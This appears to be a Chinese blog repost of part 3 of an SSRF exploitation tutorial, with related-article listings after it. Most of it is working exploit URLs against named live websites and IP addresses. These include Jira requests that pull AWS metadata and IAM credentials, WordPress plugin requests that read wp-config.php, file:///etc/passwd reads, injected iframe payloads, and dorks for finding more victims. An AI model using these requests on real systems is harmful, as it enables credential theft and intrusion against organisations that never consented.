SSRF-服务器端请求伪造(类型和利用方法)第3部分

最新推荐文章于 2024-05-23 09:30:18 发布
最新推荐文章于 2024-05-23 09:30:18 发布
阅读量1.1k 收藏
点赞数
分类专栏: # 信安文章

4.实例

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/

在这里,页面参数获取外部资源并显示其内容。

SSRF到XSS

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

读取本地文件

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

当您尝试其他URL(如dict)时,会出错

警告:file_get_contents():无法找到包装器“dict” - 你是否忘记在配置PHP时启用它。

这表示未启用DICT URL结构

FFMPEG中的SSRF

读取本地文件
Demo
https://youtu.be/OQBZ__L23KU

易受攻击的站点-

https://www.onlinevideoconverter.com/
https://www.files-conversion.com/

Repo链接:https://github.com/neex/ffmpeg-avi-m3u-xbin

SSRF在广泛使用的插件和CMS中的应用

Jira的SSRF
Jira版本号低于7.3.5正遭受SSRF的困扰

https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…

在Shodan有4万多个JIRA站点。你可以利用下面的dork

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com"  -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google"  -- For Google

现在让我们看看一些易受攻击的站点

https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details 
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://www.mfjira.io/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Details
https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Details
http://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details

这是我发现的一些易受攻击的网站

JSmol2WP Wordpress插件中的SSRF

低于1.07的JSmol2WP版本具有未经身份验证的服务器端请求伪造

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Dork -

inurl:wp-content/plugins/jsmol2wp

易受攻击的网站

https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.com
http://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details

Qards Wordpress插件中的SSRF

Qards容易受到服务器端请求伪造(SSRF)的攻击

http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

Dork-

inurl:wp-content/plugins/qards

易受攻击的网站 -

http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

HTML到PDF转换的SSRF

易受攻击的网站 -

https://pdfcrowd.com/#convert_by_input 
https://convertio.co/html-pdf/

Ssrf.html的内容

"><iframe src="file:///etc/passwd"></iframe>
"><svg/onload=document.write(document.location)> -- to know the path and some times to

以上发布的所有这些网站只是为了让您练习,作者不对任何滥用信息负责。

 

 

转自:https://mp.weixin.qq.com/s/fNQ-fsGJUlK2nWVBKI-boA

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF(服务器端请求伪造
nz9611的博客
07-15 1973
SSRF(服务器端请求伪造),也称为XSPA(跨站端口攻击)。利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制。 一般情况下,攻击者无法绕过waf向内网发送恶意请求,达到攻击目的。而SSRF的出现使得waf变得不再那么无敌。攻击者通过伪造服务器请求与内网进行交互,从而达到探测内网,对内网进行攻击的目的(与多种攻击方式相结合)。 那么哪些地方容易出现SSRF攻击呢? 1.通过URL地址分...
Web安全之SSRF漏洞
热门推荐
我不是大牛
07-04 2万+
内容 SSRF漏洞的危害 SSRF漏洞的挖掘 SSRF漏洞的防御 SSRF漏洞原理概述 背景 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 概述 很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片...
SSRF(服务器端请求伪造)浅析
weixin_43553654的博客
07-28 369
0x00 SSRF漏洞的定义与成因 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 上边这些都是一些在百度
推荐开源项目:SSRF Proxy——智能利用SSRF的HTTP代理服务器
最新发布
gitblog_00024的博客
05-23 712
推荐开源项目:SSRF Proxy——智能利用SSRF的HTTP代理服务器 ssrf_proxySSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery.项目地址:https://gitcode.com/gh_mirrors/ss/s...
wooyun常见ssrf总结+常见ssrf绕过姿势
HWHXY的博客
01-31 998
wooyun常见ssrf总结 直接看总结就行了,懒人一个。 0x01. weblogic CVE-2014-4210 http://221.239.120.208/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.9.136&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&
PortSwigger 服务端请求伪造SSRF)
weixin_42451330的博客
11-18 1014
本文介绍PortSwigger靶场 服务端请求伪造SSRF),包括基本SSRF、另一个系统SSRF、黑名单SSRF、白名单SSRF,重定向SSRF、盲外带SSRF。如有疑问欢迎私聊。
安全客 2017年季刊-第三期
04-20
SSRF(服务器端请求伪造)攻击的讨论则围绕攻击者如何利用服务器应用程序中的漏洞,进而实现对内网服务的非法访问和攻击。针对IoT设备的漏洞分析,涉及了对数百万设备可能构成风险的安全问题,这反映了随着物联网...
第二届祥云杯 Web 题解1
08-03
本次题目主要涉及两个核心安全问题:服务器端请求伪造(SSRF)和 session 条件竞争,以及 PHP 反序列化的漏洞利用。接下来,我们将详细探讨这些概念及其在题目中的具体体现。 ##### 1. SSRF (Server-Side Request ...
kontra-appsec:练习记录
02-19
服务器端请求伪造SSRF) 将其视为代表服务器发出请求,有点像跨站点请求伪造 实际的定义是:操纵Web应用程序以将未经授权的请求发送到第三方网站或资源的能力 SSRF漏洞最常见于与以下功能相关的功能: PDF生成...
sso-microservices-oauth2
07-09
9. **安全性考虑**:了解如何防止常见的攻击,如 CSRF(跨站请求伪造)和 SSRF(服务器端请求伪造)。 10. **测试与调试**:学习如何设置单元测试和集成测试,以确保 OAuth2 流程的正确性。 这个项目涵盖了微服务...
web-hacking-101
01-09
6. **服务器端请求伪造SSRF)**:攻击者可以通过此漏洞利用服务器发起内部网络请求,暴露内网服务。了解SSRF的工作原理和防御方法对保障企业内部安全至关重要。 7. **目录遍历**:通过特定的URL构造,攻击者可以...
Conversion.com的最佳Chrome扩展程序「Conversion.com's Optimizely Chrome Extension」-crx插件
03-09
通过此扩展程序,您可以在给定页面上了解有关Optimizely的信息 - 在页面上运行Optimizely时显示 - 查看页面上正在进行的实验 - 打开/关闭QA模式 - 查看Optimizely事件 - 能够改变你在实验中的变化 - 将实验网址复制到剪贴板(包括您选择的变体) - 实验网址的QR码(包括您选择的变体) - 在不同的选项卡中打开某个实验的所有变体 - 直接访问实验的结果和编辑器页面 - 查看当前的Optimizely版本ID - 获取帐户保存状态 - 适用于Optimizely Classic&Optimizely X - Optimizely事件的实时浏览器内通知 支持语言:English (UK)
SSRF——服务端请求伪造
weixin_46601374的博客
03-20 3576
什么是SSRF? 服务器端请求伪造SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务) 什么是SSRF 攻击者能够从易受攻击的web程序,发送精心设计的请求的对其他网站进行攻击,即利用一个可发起网络请求服务当做跳板来攻击其他服务 ssrf有什么作用 一般用于探测内网端口及信息,查看文件,甚至可以getshell 攻击内外网的web应用。 ssrf一般存在于哪些地方 能够对外发起网络请求
SSRF(服务端请求伪造)漏洞
墨鱼菜鸡
12-12 166
目录 SSRF SSRF漏洞的挖掘 SSRF漏洞利用 SSRF漏洞防御 SSRF SSRF(Server-Side Request Forgery,服务器端请求伪造)漏洞,是一种由攻击者构造请求,由服务器端发起请求的安全漏洞,本质上是属于信息泄露漏洞。 SSRF漏洞原理:很多web应用都提供了...
文件导出功能的SSRF
yggcwhat
04-25 1380
0x00 前言 文章开始前我们先讲述一下metadata service,也就是云服务器的元数据,每个云服务器厂商都有元数据,只是获取的接口地址不同,获取到的内容也不一样,有些元数据中是可以获取到登录凭证,可以直接接管服务器。由于元数据只能在云服务器上请求特定地址才能获取到,所以也常常用来作为ssrf利用方式的一种。 0x01 metadata service 阿里云 URL:http://100.100.100.200 基本实例元数据项,就不做展示了,感兴趣的可以查看下官方文档https://h
如何利用文件上传漏洞-以及如何修复它们
2201_75362610的博客
01-25 978
当服务器允许用户在不验证文件名称、大小、类型、内容等的情况下上传文件时,就会出现文件上传漏洞。在本文中,我们将了解可用于利用不当文件上传功能并绕过常见防御机制的常见攻击媒介。最后的最后的最后的最后的最后的再见黑客学习资源推荐最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。😝朋友们如果有需要的话,可以V扫描下方二维码联系领取~
20210226web渗透学习之SSRF总结
qq_45290991的博客
05-26 1166
翻译作者:国勇(信安之路特约作者) 原文地址:https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 SSRF 是什么 服务器端请求伪造SSRF)是指攻击者能够通过存在漏洞的 web 应用程序发送黑客制造的请求 简单来说,黑客可以告诉服务器一个网址,服务器负责去请求这个网址。 例如: GET /?url=http://google.com/H
oauth2授权码登录踩坑积累一(登录页无法跳转到授权页面)
liu379333171的博客
09-10 1万+
导读: 最近一直在集成springcloud+oauth2授权登录,密码模式和自定义的短信验证码已经按照网上的教程集成好了, 其中也有很多坑,,网上的教程大多参差不齐,缺这缺那,好像没有一个完整可跑起来的demo。 废话不说,先说现象,问下你们是不是报这个错: 现象还原: 一,调用oauth2授权码登录 二、因为没有登录,所以会跳转到登录页面, 三,输入密码跳转到授权页面 分析问题: 1,网上大量查资料,有一个比较类似现象的blog,按照他搞的完全没有效果,可能只针对他个人出现..
Atlassian OAuth plugin SSRF(CVE-2017-9506)
公众号shadow sock7
04-25 2119
jira安装参考:https://blog.csdn.net/caiqiiqi/article/details/89017806 安装jira-6.4.14版本: https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.4.14.tar.gz 漏洞测试方法: https://%basepath...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值